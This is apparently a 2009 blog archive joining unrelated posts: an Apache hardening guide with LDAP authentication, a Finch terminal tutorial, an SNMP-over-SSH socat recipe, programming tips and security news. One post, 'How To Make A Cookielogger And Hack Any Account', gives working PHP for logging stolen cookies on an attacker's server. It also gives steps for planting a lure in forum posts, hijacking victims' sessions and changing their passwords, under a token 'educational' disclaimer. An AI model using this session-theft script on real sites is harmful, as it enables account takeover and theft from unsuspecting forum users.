It’s important that you don’t set up your own userid/password store, since it propagates passwords into insecure locations. Instead, you should modify your configuration to defer authentication to a central store, such as a centrally maintained LDAP. To authenticate against an LDAP store, you need to compile Apache with support. In order to use mod_ldap, you’ll need LDAP libraries installed on your system. You can use OpenLDAP or Netscape Directory SDK for the LDAP client libraries.
Configuration commands

Here’s how to configure Apache with these options:

~> pwd

/usr/local/build/httpd-2.0.45

~> sudo ./configure –-prefix=/opt/apache2 \

--enable-so \

--enable-ssl \

--with-ldap \

--enable-ldap \

--enable-auth-ldap \

--disable-info \

--disable-status \

--disable-autoindex \

--disable-imap \

--disable-include \

--disable-userdir \

--disable-auth

checking for chosen layout... Apache

checking for working mkdir -p... yes

checking build system type... sparc64-unknown-linux-gnu

checking host system type... sparc64-unknown-linux-gnu

checking target system type... sparc64-unknown-linux-gnu

Configuring Apache Portable Runtime library ...

…

4.3 Compile the Apache server

Now that the software is validated and configured, it’s time to compile it. Since you won’t have a compiler on your production host, we’ll compile and install it on a separate server, then tar/compress it and scp it to your production host. You’ll need to run make using “sudo” so that Apache knows it can use ports < 1000.

~> pwd

/usr/local/build/httpd-2.0.45

~> sudo make

===> src

make[1]: Entering directory `/usr/local/build/httpd-2.0.45'

make[2]: Entering directory `/usr/local/build/httpd-2.0.45/src'

===> src/regex

sh ./mkh -p regcomp.c >regcomp.ih

…

4.4 Install the Apache server

If you have followed our instructions for securing the host, you will have to unpack the distribution and compile it on a separate host. To make your server more secure, use a separate disk partition for your web content. Create a unique mount point for this directory -- htdocs is a good name to use, but make it somewhere outside the ServerRoot directory. You'll need to update /etc/vfstab to mount this partition as part of your server's startup process.

Do not use the htdocs directory included in the distribution as your DocumentRoot. This directory contains user documentation that you don't want to make available to the public as it contains information a potential attacker could use to penetrate your system. (The attacker can deduce what kind of web server you’re running, and hone his attack accordingly.) Move these documentation files into your support directory so the webmasters for your site can refer to them as needed.

You’ll need to install the Apache server using “sudo” privileges or as root.

~> pwd

/usr/local/build/httpd-2.0.45

~> sudo make install

===> [mktree: Creating Apache installation tree]

./src/helpers/mkdir.sh /opt/apache2/bin

./src/helpers/mkdir.sh /opt/apache2/libexec

./src/helpers/mkdir.sh /opt/apache2/man/man1

./src/helpers/mkdir.sh /opt/apache2/man/man8

./src/helpers/mkdir.sh /opt/apache2/conf

..
5. Install SSL certificates

Now that the server is installed, we need to copy certificate key, server certificate, and CA chain to Apache’s configuration directory.

5.1 Set up the Apache certificate directories

~> pwd

/opt/apache2/conf

~> sudo mkdir ssl.crt ssl.key

5.2 Copy the certificate and key to the SSL configuration directory

~> sudo cp /usr/local/build/server.crt ./ssl.crt/.

~> sudo cp /usr/local/build/server.key ./ssl.key/.

6. Configure the Apache server

Configure the file permissions and runtime settings of the Apache server. It’s important that you place your htdocs, cgi-bin, and logs directories on separately mounted filesystems.

6.1 Configure httpd.conf

Set the following in your httpd.conf file. You can also download an example httpd.conf with these settings here.

Directive and setting

Description/rationale

ServerSignature Off

Prevents server from giving version info on error pages.

ServerTokens Prod

Prevents server from giving version info in HTTP headers

Listen 80 (remove)

Remove the “Listen” directive – we’ll set this directive only in ssl.conf, so that it will only be available over https.

User webserv (or whatever you created in step 2 above)

Ensure that the child processes run as unprivileged user

Group webserv (or whatever you created in step 2 above)

Ensure that the child processes run as unprivileged group

ErrorDocument 404 errors/404.html

ErrorDocument 500 errors/500.html

etc.

To further obfuscate the web server and version, this will redirect to a page that you should create, rather than using the default Apache pages.

ServerAdmin -webmaster@xianco.com

Use a mail alias – never use a person’s email address here.

UserDir disabled root

Remove the UserDir line, since we disabled this module. If you do enable user directories, you’ll need this line to protect root’s files.

Order Deny, Allow

deny from all

Deny access to the root file system.

deny from all

Options -FollowSymLinks -Includes -Indexes -MultiViews

AllowOverride None

Order allow,deny

Allow from all

LimitExcept prevents TRACE from allowing attackers to find a path through cache or proxy servers.

The “-“ before any directive disables that option.

FollowSymLinks allows a user to navigate outside the doc tree, and Indexes will reveal the contents of any directory in your doc tree.

Includes allows .shtml pages, which use server-side includes (potentially allowing access to the host). If you really need SSI, use IncludesNoExec instead.

AllowOverride None will prevent developers from overriding these specifications in other parts of the doc tree.

AddIcon (remove)

IndexOptions (remove)

AddDescription (remove)

ReadmeName (remove)

HeaderName (remove)

IndexIgnore (remove)

Remove all references to these directives, since we disabled the fancy indexing module.

Alias /manual (remove)

Don’t provide any accessible references to the Apache manual, it gives attackers too much info about your server.

You should familiarize yourself with the following parameters. Unless you are running a high-volume web site, you can safely leave the settings at their default values. If you are running a high-volume web site, you’ll want to adjust these directives upward to better withstand denial-of-service attacks.

* StartServers

* MinSpareServers

* MaxSpareServers

* Timeout

* Keepalive

* MaxKeepAliveRequests

* KeepAliveTimeout

* MaxClients

* MaxRequestsPerChild

6.2 Configure ssl.conf

Set the following in your ssl.conf file. You can also download an example ssl.conf with these settings here.

Directive and setting

Description/rationale

SSLCertificateChainFile /opt/apache2/conf/ssl.crt/ca.crt

(Find this line and uncomment it). This points to the Certificate Authority file for your chained certificate.

6.3 Remove default Apache files

It’s important to remove default files such as .html files and CGI scripts (yes, even the Apache manual). This will help obfuscate the server you’re running, targetted attacks against your web server. You’ll probably want to build a simple index.html page to place in the htdocs directory, just so you know the web server is working when you start it.

~> sudo rm –fr /opt/apache2/htdocs/*

~> sudo rm –fr /opt/apache2/cgi-bin/*

~> sudo rm –fr /opt/apache2/icons

To test that your web server is running, you can now place this file in your htdocs directory – it’s just a simple index.html file. Make sure you set the permissions to world-readable.

6.4 Set directory and file permissions for the server

To protect the directories on your server, it’s important that you protect the directories themselves.

* bin is where the executable portion of the Apache web server is. It should be readable/executable only by members of the webadmin group, but only writable by root.

~> sudo chown –R root:webadmin /opt/apache2/bin

~> sudo chmod –R 770 /opt/apache2/bin

* conf is where your web server configuration files are and needs to be read/writable only by the webadmin group.

~> sudo chown –R root:webadmin /opt/apache2/conf

~> sudo chmod –R 770 /opt/apache2/conf

* logs is where your access and error logs will go. It should be readable only by the webadmin group.

~> sudo chown –R root:webadmin /opt/apache2/logs

~> sudo chmod –R 755 /opt/apache2/logs

* htdocs is where your HTML files are and needs to be world readable, but writable only by root (you should copy content in from a staging server).

~> sudo chown –R root /opt/apache2/htdocs

~> sudo chmod –R 775 /opt/apache2/htdocs

* cgi-bin is where your executable scripts are and needs to be world read/executable, but writable only by root (you should copy content in from a staging server).

~> sudo chown –R root /opt/apache2/cgi-bin

~> sudo chmod –R 775 /opt/apache2/cgi-bin

7. Make final configuration and start server

Lastly, we need to modify the startup configuration for Apache and restart the server.

7.1 Modify Apache startup script so that it will notify you when it’s restarted.

As a failsafe measure, you should notify your webmaster alias any time this server is restarted. That way, you’ll be notified of any unauthorized attempt.

Open /opt/apache/bin/apachectl and add something like this to the file:

tail /opt/apache2/logs/error_log |

/bin/mail -s 'Apache web server has restarted' -webmaster@xianco.com

7.2 Test your configuration by starting the server

sudo /opt/apache2/bin/apachectl startssl

7.3 Keep your web server patched

Check web sites for Apache and all modules regularly and apply important patches.

Apache web server: http://nagoya.apache.org/dist/httpd/patches/

OpenSSL: http://www.openssl.org/source

OpenLDAP: http://www.openldap.org/

8. Configure authentication against an LDAP directory.

In this final section, we’ll configure the Apache httpd.conf file so that resources are authenticated against an LDAP server. This step really can’t be run until you’ve installed the web server. Once you’ve got your web server installed, just add the LDAP authentication directives to any directory (or httpd.conf file) where you want password protection with CEC credentials. Here’s an example of protecting a directory named “Internal”

AuthName CEC

AuthType Basic

AuthLDAPURL ldap://ldap.xianco.com:389/ou=employees,ou=people,o=xianco.com?uid?sub?(objectclass=xiancoPerson)

require valid-user

Finch - Howto use Pidgin via Terminal Console

2009-07-27T09:05:00.001-07:00

For those who have starts getting in love with Terminal Console in Ubuntu, you may love to be able to do everything from the Terminal console. Even if I previously said, I've already bored with the terminal coz I see it every day...
it is good to know that actually, your terminal can do almost everything you wanna do in your linux box. I just don't like the way it looks and feel because I love art and graphics. I like the eye catchy graphics and also the live cubic desktop effect and so on. Anyway, I would like to share on how to use your Pidgin from terminal console.

I have a lot to say about situations where you only got your terminal console to use programs in linux. But lets keep it short and go straight to the point now. The program to enable you to use Pidgin via Terminal console is called Finch. Finch as in the manual is "A Pimpin’ Penguin console frontend to libpurple Instant Messaging client."

Run this command on your terminal to install finch in Ubuntu:

$ sudo apt-get install finch

After installation, you can now use your Pidgin from the terminal console by running this command on your terminal:

$ finch

As you wish to use terminal, you should already aware that you can't use your mouse (too bad for mousey... LOL). So, you have to be ready with keyboard shortcuts to use this application. Here is the quick list of useful keyboard shortcut to be use within Finch (taken from 'man finch'):

Finch: GNT Shortcut

Shortcut Description
Alt + a Bring up a list of available actions. You can use this list to access the accounts window, plugins window, preference window etc.
Alt + n Go to the next window.
Alt + p Go to the previous window.
Alt + w Show the list of windows. You can select and jump to any window from the list.
Alt + c Close the current window.
Alt + q Quit.
Alt + m Start moving a window. Press the cursor keys to move the window. When you are done, press Enter or Escape.
Alt + r Start resizing a window. Press the cursor keys to resize the window. When you are done, press Enter or Escape.
Alt + d Dump the contents of the screen in HTML format in a file named "dump.html" in working directory.
Alt + . Move the position of the current window in the window list one place to the right.
Alt + , Move the position of the current window in the window list one place to the left.
Alt + l Refresh the windows. This is useful after resizing the terminal window.
Alt + 1 2 ... 0 Jump to the 1st, 2nd ... 10th window.
Ctrl + o Bring up the menu (if there is one) for a window. Note that currently only the buddylist has a menu.
Alt + / Show a list of available key-bindings for the current widget in focus.
Alt + > Switch to the next workspace
Alt + < Switch to the previous workspace
Alt + t Tag (or untag) the current window
Alt + T Attached all the tag windows to the current workspace
Alt + s Show the workspace list
F9 Create a new workspace and switch to it

You may now grab your terminal, try and feel it for yourself. For more information, you may simply call "man finch" and read them. That's all for now mate, Enjoy Ubuntu!!

reference: http://coderstalk.blogspot.com/2008/09/finch-howto-use-pidgin-via-terminal.html

SNMP over SSH

2009-07-26T00:44:00.001-07:00

Many monitoring softwares like EM7, Nagios need SNMP service running on servers to be monitored. However administrator or security admin never want to make SNMP running on their production servers because of Security issues. Here is workaround for this issue. We will run SNMP through SSH (encrypted) channel and will make it secured.

We will be using few terms here:

1. Producer: The Server which you want to Monitor running net-snmp

2. Proxy: Accessible to Both to Monitoring Server (MS) and to the Producer. Proxy machine will be in local network of MS.

3. MS: Monitoring Server

Prerequisites:

socat should be installed on

Scenario:

I want to monitor my Personal System from MS. I have setup Firewall to access my system. In that Only port 22 is open. You cannot access SNMP running on my personal system directly. So I have setup one Proxy Machine i.e. ABC which is accessible to MS and you can access my machine from ABC also.

Proxy Machine: ABC 10.0.0.1

On Proxy Machine:

ssh -f -N root@ -L 6004:localhost:6004

Start TCP to UDP socat on Producer:

socat -d -d -d -lffoo.log TCP4-LISTEN:6004,fork UDP4:localhost:161

Start UDP to TCP socat on Proxy:

socat -d -d -d -lffoo.log UDP4-LISTEN:161,fork TCP:localhost:6004

Test by running snmpwalk on Proxy Machine:

snmpwalk -v1 -c public localhost
Now use port 161 of Proxy machine to access SNMP data of Producer and start monitoring it.

reference:linuxforums

How to become a better programmer

2009-07-22T05:22:00.001-07:00

Join an online programming community

There are a lot of online programming communities that you can join that will help you improve your programming ability. These communities have the latest programming news, articles and howtos, and forums. Keeping up with the news will help you stay with the times. Reading the articles and howtos will improve your programming skill. The forums are always a great way to not only get help but to help other people and learn things you didn't know in the process.
Work on an open source project

It is a good idea to work on an open source project because you will get to be part of the development of a real program. You are not only learning while you are doing your own coding but you are learning from the code of the other programmers.
Do personal projects

If you would rather work on a project by yourself then that is also a great way to learn. You need to make sure that you try something that is very different to what you have programmed before to get the most benefit. The best thing about working on personal projects is that you are free to use the latest technologies and learn all about them.
Read programming books

The Internet has so much information about programming that it seems as if books are now useless but that is definately not true. Books go into things in a lot more detail and the more details you learn about something the better you will be at it. You can also carry a book around with you which you can't always do with a computer.
Program in another language or field

It is nice to have a good knowledge of one programming language but the popularity of programming languages seems to change so quickly. You need to be prepared for new programming languages otherwise you might not be able to program very much in the future. Other programming languages will also make you look at the way that you program in languages you already know in a different way. If you have mostly only made accounting programs then it means that you will have a hard time programming other types of software. You need to learn about how programs are made in different industry fields so that you get new ideas and learn new ways to program.
Learn about non-programming things

The interesting thing about programming is that you get the chance to learn about all the different industries that are not related to IT. The downside of this is that you have to learn about a new industry every time you work on a new program. If you think ahead and learn about all the different industries then you will prepare yourself for when you have to program for another industry. Learning about things that are not related to programming can also give you new ideas on how to solve programming problems.
Refresh your knowledge

When you haven't worked with a programming language or technology for a while then you forget a lot about it. You need to hold on to your previous knowledge by practicing things that you have learnt in the past.

How To Make A Cookielogger And Hack Any Account

2009-07-21T19:55:00.000-07:00

Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Google, Yahoo, Orkut, Facebook, Flickr etc.

What is a CookieLogger?

A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.

Today I am going to show How to make your own Cookie Logger…Hope you will enjoy Reading it …

Step 1: Save the notepad file from the link below and Rename it as Fun.gif:

Download it here.

Step 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php:

$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “\r\n” . $_GET["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
?>

Step 3: Create a new Notepad File and Save it as logfile.txt

Step 4: Upload this file to your server

cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/fun.gif

If you don’t have any Website then you can use the following Website to get a Free Website which has php support :

http://0fees.net

Step 5: Go to the victim forum and insert this code in the signature or a post :

Download it here.

Step 6: When the victim see the post he view the image u uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows:

phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6% 3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9

Step 7: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.

Step 8: Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim’s account information.

Note: Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim’s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login.

Disclaimer: I don’t take Responsibility for what you do with this script, served for Educational purpose only.

I DIDN'T WRITE THIS, FOR ANYONE WHO THOUGHT I DID,
JUST CONTRIBUTING.

reference:hackforums..

Another High-profile Hack, DDOS Probe Goes Global

2009-07-19T05:53:00.000-07:00

A high-profile hack of a Twitter employee's e-mail and Google Apps accounts tops our news this week, in part because the whole saga offers a reminder about the need for strong passwords and exercising caution about what personal information is posted at social-networking sites, especially if, say, that information gives clues to your passwords. Elsewhere in security news, or perhaps we should say just about everywhere in security news, the search spread worldwide for the source of the massive denial-of-service attacks earlier this month.

1. Hacker break-in of Twitter e-mail yields secret docs, Twitter/Google Apps hack raises questions about cloud security and Possible Twitter lawsuit would dive into murky blog waters: A hacker got into a Twitter employee's e-mail account and stole confidential documents about a month ago, raising concerns about cloud-computing security and leading to another round of warnings about the need for strong passwords and the pitfalls of posting personal information on social-networking sites, among other things. The hacker used information obtained from the administrative assistant's e-mail account to access the employee's Google Apps account. In a further twist, the hacker offered the confidential documents to some bloggers and online sites, prompting Twitter cofounder Biz Stone to threaten legal action against those who publish the information.

2. Cyberattack probe goes global: British authorities are investigating the cyberattacks earlier this month that brought down prominent Web sites in the U.S., including government sites, and in South Korea. Security researchers traced the master command-and-control server used in the denial-of-service attacks to the U.K., but the master server apparently was located in Miami.

3. Reports: Microsoft and Yahoo close to search ad deal: The story that refuses to die reared its head again this week with reports that Microsoft and Yahoo are close to a search ad deal that could happen in less than a week. If it does, we will fill you in on the details next week and then hope to never have to speak of the matter again.

4. Wall Street Beat: IT investors eye bellwether financials: Various IT bellwethers reported quarterly financials this week, with some encouraging signs that tech spending has bottomed out and will begin to climb out of the rut it has been in as the second half of the year progresses.

5. Analysts see alarming development in mobile malware: Mobile botnets are surely on the horizon, with the first worm that spread on mobile devices via spam text messages the harbinger, says one security vendor.

6. Sun shareholders give nod to Oracle deal: Sun shareholders approved the company's acquisition by Oracle, but the voting margin in favor of the deal was "surprisingly low" in the opinion of Dan Olds, an analyst with Gabriel Consulting Group.

7. China's Internet users outnumber U.S. population: China had 338 million Internet users at the end of June -- more than the U.S. population, which stands at just shy of 307 million. More people in China are using e-commerce and accessing the Web using mobile phones than previously, and overall Internet use there is the highest of any country, according to the China Internet Network Information Center.

8. Survey says most companies won't deploy Windows 7: Almost six in 10 companies have no current plans to move to Microsoft's Windows 7, which is supposed to be out in October, according to a survey published by ScriptLogic, which makes software tools for the Windows OS.

9. Spam: Still a shopper's paradise: For those of us who remain mystified about why it is that spam messages purporting to sell products keep rolling into our inboxes -- who in the world clicks on those links? -- the Messaging Anti-Abuse Working Group supplied some answers. Twelve percent of respondents to a recent survey said they bought something that way, and that apparently is a high enough percentage to make spam a lucrative venture. As Ian Paul says at the outset of his column about the survey -- "All right. Listen up people: We have a problem."

10. 10 gifts from Apollo and Apollo's 40th anniversary shows true wonder of the Internet: We end this week's Top 10 with a Network World slide show that looks at 10 technologies brought to us by NASA's Apollo 11 project that landed men on the moon 40 years ago on July 20. "And today, through the true magic of the Internet, we are able to again see, hear and experience a second-by-second re-enactment of that spectacular event and relive it right on our computer screens," Todd Weiss marvels in his PC World column.

reference:http://www.packetstormsecurity.org/,http://www.pcworld.com/businesscenter/article/168640/another_highprofile_hack_ddos_probe_goes_global.html

Portland sites hacked by Turkish hackers

2009-07-19T05:52:00.000-07:00

A handful of Portland Web sites became the unsuspecting targets of Turkish hackers over the weekend.

The home page of the Central Northeast Neighbors was replaced by a message claiming the site had been cracked by a Turkish hacker. Five other sites were also hit.

"We're a small community non-profit so it's kind of odd he would choose us," said Sandra Lefrancois, community program director.

Todd Coward, the owner of the company that hosts and services the sites, said the hacker simply erased the homepage and replaced it with his own.

Coward keeps all the files and data on private servers. He hosts more than 30 sites but only a handful were hacked. He said there's no way of knowing who is really responsible.

"I suspect he's in Turkey, (but) I don't know where he is," Coward said. "I think these people do this just to show he can do it."

Central Northeast neighbors were left wondering why they became the victims of an online hijacking.

"People don't really understand what this is all about," Lefrancois said. "Is it dangerous? Is it hurting something? Is it ruining my computer? Even somebody just looking at the site, there's kind of an aura of fear there."

LeFrancois said she hopes the hacking doesn't keep people away from the sites.

"The thing is, they may not come back to the site," she said. "We want people to repeatedly come back."

A Google search Wednesday showed numerous sites claiming to be hacked. All sites were running as normal by Wednesday night.

reference:http://www.packetstormsecurity.org/,http://www.kxl.com/ArticlePage/itemid/18048/Portland-sites-hacked-by-Turkish-hackers/